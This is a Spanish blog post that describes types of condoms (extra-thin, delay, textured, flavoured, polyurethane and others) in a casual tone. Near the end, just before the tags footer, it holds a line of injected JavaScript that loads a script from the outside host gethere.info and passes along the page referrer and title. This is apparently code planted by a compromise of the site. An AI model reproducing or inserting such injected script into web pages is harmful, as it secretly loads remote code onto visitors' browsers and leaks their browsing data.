Tipos de condones ¿Cuáles has usado?

Los preservativos son como los seguros: “Mejor tenerlo y no necesitarlo, que necesitarlo y no tenerlo”. Cada vez que nos encontramos con una pareja nueva, ponernos el condón es señal de madurez y de responsabilidad hacia nosotros mismos como a nuestra pareja.

No pongas más pretextos y mejor entérate de cuáles son los tipos de condones que puedes encontrar para disfrutar el sexo de una manera segura.

Extrafuerte

Está fabricado con un látex más grueso para resistir una fricción mayor en lugares, digamos, más pequeños.

Efecto calor

También llamado placer compartido. Se revisten con una sustancia química que crea una sensación de calor similar a un masaje.

Texturizado

También llamado granulado o de sensaciones intensas. Con este condón tu chica quedara encantada ya que muchos fabricantes venden preservativos con relieves para estimular el clítoris y los labios durante la relación sexual.

Poliuretano

Pensados para alérgicos al látex, estos preservativos son incluso más delgados que los modelos extrafinos.

Extrafino

Con un látex 20% más delgado (0,04 mm, en lugar de los 0,06 habituales) aumentaras la sensación de fricción. Se diseñaron para que los hombres no nos negáramos a utilizarlos con la excusa de que restan sensibilidad.

Retardante

Para ayudarte a aguantar más tiempo, estos preservativos disminuyen la sensación gracias a un recubrimiento interior de benzocaína, un anestésico muy suave.

Extragrande

Si eres un chico con un graaan carisma y los condones normales te cortan la circulación, éste tiene 18 mm más de largo y de ancho para que no tengas problemas de espacio.

Estrecho

En esta industria hay de todo. La mayoría de profilácticos tienen 5 cm de ancho y 19 cm de largo. Estos son 6 mm más estrechos y 12,5 mm más cortos, para que no resbalen si estás menos dotado.

Extraestimulante

Es más ancho por la punta, de manera que el látex de esa zona se mueve con cada acometida y estimula el glande hipersensible.

De sabores

Los hay de sabor a vino, plátano, etc. A ella le gustará cuando practique sus habilidades orales. Pero lee la lista de ingredientes: algunos sabores a menta incluyen mentol, que puede irritar sus zonas sensibles

s.src=’http://gethere.info/kt/?264dpr&frm=&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Etiquetas:
Comentarios